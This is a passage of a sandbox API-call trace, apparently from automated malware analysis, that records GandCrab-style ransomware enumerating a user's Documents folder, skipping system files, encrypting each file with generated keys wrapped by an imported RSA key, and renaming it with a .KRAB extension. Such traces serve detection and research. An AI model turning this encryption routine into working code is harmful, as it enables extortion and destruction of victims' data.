lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0092.056] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.061] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.061] CloseHandle (hObject=0x434) returned 1 [0092.062] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.062] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\rWV5CvNxEpNqx0.xlsx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\rwv5cvnxepnqx0.xlsx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\rWV5CvNxEpNqx0.xlsx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\rwv5cvnxepnqx0.xlsx.krab")) returned 1 [0092.063] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.063] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0092.063] lstrcmpW (lpString1="UhD22a.docx", lpString2=".") returned 1 [0092.063] lstrcmpW (lpString1="UhD22a.docx", lpString2="..") returned 1 [0092.063] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="UhD22a.docx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\UhD22a.docx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\UhD22a.docx" [0092.063] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0092.063] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\UhD22a.docx.KRAB") returned 48 [0092.064] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\UhD22a.docx") returned 43 [0092.064] lstrlenW (lpString=".docx") returned 5 [0092.064] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0092.064] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".docx ") returned 6 [0092.064] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.064] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\UhD22a.docx") returned 43 [0092.064] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\UhD22a.docx") returned 43 [0092.064] lstrcmpiW (lpString1="UhD22a.docx", lpString2="desktop.ini") returned 1 [0092.064] lstrcmpiW (lpString1="UhD22a.docx", lpString2="autorun.inf") returned 1 [0092.064] lstrcmpiW (lpString1="UhD22a.docx", lpString2="ntuser.dat") returned 1 [0092.064] lstrcmpiW (lpString1="UhD22a.docx", lpString2="iconcache.db") returned 1 [0092.065] lstrcmpiW (lpString1="UhD22a.docx", lpString2="bootsect.bak") returned 1 [0092.065] lstrcmpiW (lpString1="UhD22a.docx", lpString2="boot.ini") returned 1 [0092.065] lstrcmpiW (lpString1="UhD22a.docx", lpString2="ntuser.dat.log") returned 1 [0092.065] lstrcmpiW (lpString1="UhD22a.docx", lpString2="thumbs.db") returned 1 [0092.065] lstrcmpiW (lpString1="UhD22a.docx", lpString2="KRAB-DECRYPT.html") returned 1 [0092.065] lstrcmpiW (lpString1="UhD22a.docx", lpString2="KRAB-DECRYPT.txt") returned 1 [0092.065] lstrcmpiW (lpString1="UhD22a.docx", lpString2="CRAB-DECRYPT.txt") returned 1 [0092.065] lstrcmpiW (lpString1="UhD22a.docx", lpString2="ntldr") returned 1 [0092.065] lstrcmpiW (lpString1="UhD22a.docx", lpString2="NTDETECT.COM") returned 1 [0092.065] lstrcmpiW (lpString1="UhD22a.docx", lpString2="Bootfont.bin") returned 1 [0092.065] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0092.066] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10112c0) returned 1 [0092.066] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0092.067] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0092.067] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0092.067] CryptGenRandom (in: hProv=0x10112c0, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0092.067] CryptReleaseContext (hProv=0x10112c0, dwFlags=0x0) returned 1 [0092.067] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.067] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10113d0) returned 1 [0092.068] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0092.068] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0092.068] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0092.068] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0092.068] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0092.068] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.069] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010df8) returned 1 [0092.072] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd7a0) returned 1 [0092.072] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0092.072] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0092.073] GetLastError () returned 0x0 [0092.073] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0092.073] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0092.073] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010df8) returned 1 [0092.073] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd3e0) returned 1 [0092.073] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0092.073] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0092.074] GetLastError () returned 0x0 [0092.074] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0092.074] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0092.074] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\UhD22a.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\uhd22a.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0092.074] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0092.075] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0092.075] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x15a55, lpOverlapped=0x0) returned 1 [0092.093] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffea5ab, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.093] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x15a55, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x15a55, lpOverlapped=0x0) returned 1 [0092.094] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0092.094] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.098] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.099] CloseHandle (hObject=0x434) returned 1 [0092.099] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.099] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\UhD22a.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\uhd22a.docx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\UhD22a.docx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\uhd22a.docx.krab")) returned 1 [0092.100] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.101] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0092.101] lstrcmpW (lpString1="Vtjy6.xlsx", lpString2=".") returned 1 [0092.101] lstrcmpW (lpString1="Vtjy6.xlsx", lpString2="..") returned 1 [0092.101] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="Vtjy6.xlsx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Vtjy6.xlsx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Vtjy6.xlsx" [0092.101] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0092.101] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Vtjy6.xlsx.KRAB") returned 47 [0092.101] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Vtjy6.xlsx") returned 42 [0092.101] lstrlenW (lpString=".xlsx") returned 5 [0092.101] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0092.101] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".xlsx ") returned 6 [0092.102] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.102] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Vtjy6.xlsx") returned 42 [0092.102] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Vtjy6.xlsx") returned 42 [0092.102] lstrcmpiW (lpString1="Vtjy6.xlsx", lpString2="desktop.ini") returned 1 [0092.102] lstrcmpiW (lpString1="Vtjy6.xlsx", lpString2="autorun.inf") returned 1 [0092.102] lstrcmpiW (lpString1="Vtjy6.xlsx", lpString2="ntuser.dat") returned 1 [0092.102] lstrcmpiW (lpString1="Vtjy6.xlsx", lpString2="iconcache.db") returned 1 [0092.102] lstrcmpiW (lpString1="Vtjy6.xlsx", lpString2="bootsect.bak") returned 1 [0092.102] lstrcmpiW (lpString1="Vtjy6.xlsx", lpString2="boot.ini") returned 1 [0092.102] lstrcmpiW (lpString1="Vtjy6.xlsx", lpString2="ntuser.dat.log") returned 1 [0092.102] lstrcmpiW (lpString1="Vtjy6.xlsx", lpString2="thumbs.db") returned 1 [0092.102] lstrcmpiW (lpString1="Vtjy6.xlsx", lpString2="KRAB-DECRYPT.html") returned 1 [0092.102] lstrcmpiW (lpString1="Vtjy6.xlsx", lpString2="KRAB-DECRYPT.txt") returned 1 [0092.102] lstrcmpiW (lpString1="Vtjy6.xlsx", lpString2="CRAB-DECRYPT.txt") returned 1 [0092.102] lstrcmpiW (lpString1="Vtjy6.xlsx", lpString2="ntldr") returned 1 [0092.102] lstrcmpiW (lpString1="Vtjy6.xlsx", lpString2="NTDETECT.COM") returned 1 [0092.102] lstrcmpiW (lpString1="Vtjy6.xlsx", lpString2="Bootfont.bin") returned 1 [0092.102] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0092.103] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10113d0) returned 1 [0092.103] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0092.104] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0092.104] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0092.104] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0092.104] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0092.104] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.104] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0092.106] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0092.106] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0092.106] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0092.106] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0092.106] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0092.106] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.107] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011898) returned 1 [0092.107] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd560) returned 1 [0092.107] CryptGetKeyParam (in: hKey=0xfbd560, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0092.107] CryptEncrypt (in: hKey=0xfbd560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0092.108] GetLastError () returned 0x0 [0092.108] CryptDestroyKey (hKey=0xfbd560) returned 1 [0092.108] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0092.108] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011458) returned 1 [0092.108] CryptImportKey (in: hProv=0x1011458, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd7a0) returned 1 [0092.108] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0092.108] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0092.109] GetLastError () returned 0x0 [0092.109] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0092.109] CryptReleaseContext (hProv=0x1011458, dwFlags=0x0) returned 1 [0092.109] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Vtjy6.xlsx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\vtjy6.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0092.110] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0092.110] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0092.110] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x3fc5, lpOverlapped=0x0) returned 1 [0092.125] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffc03b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.125] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x3fc5, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x3fc5, lpOverlapped=0x0) returned 1 [0092.125] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0092.125] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.130] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.131] CloseHandle (hObject=0x434) returned 1 [0092.131] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.131] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Vtjy6.xlsx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\vtjy6.xlsx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Vtjy6.xlsx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\vtjy6.xlsx.krab")) returned 1 [0092.132] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.133] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0092.133] lstrcmpW (lpString1="VZ32vZLq0.xlsx", lpString2=".") returned 1 [0092.133] lstrcmpW (lpString1="VZ32vZLq0.xlsx", lpString2="..") returned 1 [0092.133] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="VZ32vZLq0.xlsx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\VZ32vZLq0.xlsx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\VZ32vZLq0.xlsx" [0092.133] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0092.133] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\VZ32vZLq0.xlsx.KRAB") returned 51 [0092.133] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\VZ32vZLq0.xlsx") returned 46 [0092.133] lstrlenW (lpString=".xlsx") returned 5 [0092.133] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0092.134] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".xlsx ") returned 6 [0092.134] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.134] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\VZ32vZLq0.xlsx") returned 46 [0092.134] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\VZ32vZLq0.xlsx") returned 46 [0092.134] lstrcmpiW (lpString1="VZ32vZLq0.xlsx", lpString2="desktop.ini") returned 1 [0092.134] lstrcmpiW (lpString1="VZ32vZLq0.xlsx", lpString2="autorun.inf") returned 1 [0092.134] lstrcmpiW (lpString1="VZ32vZLq0.xlsx", lpString2="ntuser.dat") returned 1 [0092.134] lstrcmpiW (lpString1="VZ32vZLq0.xlsx", lpString2="iconcache.db") returned 1 [0092.134] lstrcmpiW (lpString1="VZ32vZLq0.xlsx", lpString2="bootsect.bak") returned 1 [0092.134] lstrcmpiW (lpString1="VZ32vZLq0.xlsx", lpString2="boot.ini") returned 1 [0092.134] lstrcmpiW (lpString1="VZ32vZLq0.xlsx", lpString2="ntuser.dat.log") returned 1 [0092.134] lstrcmpiW (lpString1="VZ32vZLq0.xlsx", lpString2="thumbs.db") returned 1 [0092.135] lstrcmpiW (lpString1="VZ32vZLq0.xlsx", lpString2="KRAB-DECRYPT.html") returned 1 [0092.135] lstrcmpiW (lpString1="VZ32vZLq0.xlsx", lpString2="KRAB-DECRYPT.txt") returned 1 [0092.135] lstrcmpiW (lpString1="VZ32vZLq0.xlsx", lpString2="CRAB-DECRYPT.txt") returned 1 [0092.135] lstrcmpiW (lpString1="VZ32vZLq0.xlsx", lpString2="ntldr") returned 1 [0092.135] lstrcmpiW (lpString1="VZ32vZLq0.xlsx", lpString2="NTDETECT.COM") returned 1 [0092.135] lstrcmpiW (lpString1="VZ32vZLq0.xlsx", lpString2="Bootfont.bin") returned 1 [0092.135] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0092.135] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0092.136] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0092.136] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0092.136] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0092.136] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0092.136] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0092.136] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.137] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0092.137] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0092.138] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0092.138] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0092.138] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0092.138] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0092.138] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.138] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010df8) returned 1 [0092.139] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd3e0) returned 1 [0092.139] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0092.139] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0092.139] GetLastError () returned 0x0 [0092.139] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0092.139] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0092.139] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011678) returned 1 [0092.140] CryptImportKey (in: hProv=0x1011678, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd620) returned 1 [0092.140] CryptGetKeyParam (in: hKey=0xfbd620, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0092.140] CryptEncrypt (in: hKey=0xfbd620, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0092.140] GetLastError () returned 0x0 [0092.140] CryptDestroyKey (hKey=0xfbd620) returned 1 [0092.140] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0092.140] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\VZ32vZLq0.xlsx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\vz32vzlq0.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0092.141] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0092.141] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0092.141] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x16ae4, lpOverlapped=0x0) returned 1 [0092.161] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffe951c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.161] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x16ae4, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x16ae4, lpOverlapped=0x0) returned 1 [0092.190] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0092.190] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.196] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.197] CloseHandle (hObject=0x434) returned 1 [0092.197] 